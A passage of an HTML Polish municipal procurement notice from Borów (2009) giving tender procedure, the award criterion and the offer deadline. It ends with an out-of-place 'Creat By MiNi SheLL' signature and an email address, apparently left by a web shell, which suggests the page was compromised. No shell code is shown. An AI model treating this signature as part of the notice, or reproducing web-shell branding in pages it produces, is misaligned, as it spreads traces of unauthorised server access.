6.	zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące prze upływem terminu składania ofert;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.borow.ibip.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul.Konstytucji 3 Maja 22, 57-160 Borów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2009 godzina 15:00, miejsce: ul.Konstytucji 3 Maja 22, 57-160 Borów -sekretariat urzędu Gminy Borów.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com